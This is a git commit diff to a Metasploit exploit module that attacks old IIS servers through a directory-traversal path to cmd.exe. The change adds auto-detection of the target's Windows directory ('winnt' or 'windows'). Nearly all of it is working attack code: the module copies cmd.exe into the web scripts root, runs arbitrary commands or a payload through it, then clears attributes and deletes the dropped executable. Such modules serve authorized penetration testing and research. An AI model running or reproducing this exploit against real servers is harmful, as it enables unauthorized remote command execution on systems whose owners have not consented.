Fixes #4752 - Auto-detect the windows directory and use it for subsequent requests
git-svn-id: file:///home/svn/framework3/trunk@12997 4d416f70-5f16-0410-b530-b9f4589650daunstable
Joshua Drake
parent
03464a168e
commit
69963a45ab
|
|
@ -53,6 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
Opt::RPORT(80),
|
||||
OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
|
||||
OptString.new('WINDIR', [ false, 'The windows directory of the target host', nil ]),
|
||||
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ])
|
||||
], self.class)
|
||||
|
||||
|
|
@ -105,14 +106,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[headers, body]
|
||||
end
|
||||
|
||||
|
||||
def detect_windows_dir()
|
||||
win_dirs = [ 'winnt', 'windows' ]
|
||||
win_dirs.each { |dir|
|
||||
|
||||
res = execute_command("dir", { :windir => dir })
|
||||
if (res.kind_of?(Array))
|
||||
body = res[1]
|
||||
if (body and body =~ /Directory of /)
|
||||
return dir
|
||||
end
|
||||
end
|
||||
}
|
||||
return nil
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
res = execute_command("dir")
|
||||
if (res.kind_of?(Array))
|
||||
body = res[1]
|
||||
if (body and body =~ /Directory of /)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
@win_dir = detect_windows_dir()
|
||||
if @win_dir
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
|
|
@ -129,14 +143,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Using the "start" method doesn't seem to make iis very happy :(
|
||||
return [nil,nil] if cmd =~ /^start [a-zA-Z]+\.exe$/
|
||||
|
||||
print_status("Executing command: #{cmd}")
|
||||
print_status("Executing command: #{cmd} (options: #{opts.inspect})")
|
||||
|
||||
uri = '/scripts/'
|
||||
exe = opts[:cgifname]
|
||||
if (not exe)
|
||||
uri << dotdotslash
|
||||
uri << dotdotslash
|
||||
uri << 'winnt/system32/cmd.exe'
|
||||
uri << (opts[:windir] || @win_dir)
|
||||
uri << '/system32/cmd.exe'
|
||||
else
|
||||
uri << exe
|
||||
end
|
||||
|
|
@ -156,12 +171,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
|
||||
# first copy the file
|
||||
@win_dir = datastore['WINDIR']
|
||||
if not @win_dir
|
||||
# try to detect the windows directory
|
||||
@win_dir = detect_windows_dir()
|
||||
if not @win_dir
|
||||
raise RuntimeError, "Unable to detect the target host windows directory (maybe not vulnerable)!"
|
||||
end
|
||||
end
|
||||
print_status("Using windows directory \"#{@win_dir}\"")
|
||||
|
||||
# now copy the file
|
||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
||||
print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...")
|
||||
# NOTE: this assumes %SystemRoot% on the same drive as the web scripts directory
|
||||
# However, it using %SystemRoot% doesn't seem to work :(
|
||||
res = execute_command("copy \\winnt\\system32\\cmd.exe #{exe_fname}")
|
||||
# Unfortunately, using %SystemRoot% doesn't seem to work :(
|
||||
res = execute_command("copy \\#{@win_dir}\\system32\\cmd.exe #{exe_fname}")
|
||||
|
||||
if (datastore['CMD'])
|
||||
res = execute_command(datastore['CMD'], { :cgifname => exe_fname })
|
||||
|
|
@ -220,7 +245,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
delete_me_too = "C:\\inetpub\\scripts\\" + @exe_payload
|
||||
|
||||
print_status("Changing permissions on #{delete_me_too} ...")
|
||||
cmd = "C:\\winnt\\system32\\attrib.exe -r -h -s " + delete_me_too
|
||||
cmd = "C:\\#{@win_dir}\\system32\\attrib.exe -r -h -s " + delete_me_too
|
||||
client.sys.process.execute(cmd, nil, {'Hidden' => true })
|
||||
|
||||
print_status("Deleting #{delete_me_too} ...")
|
||||
|
|
|
|||
Loading…
Reference in New Issue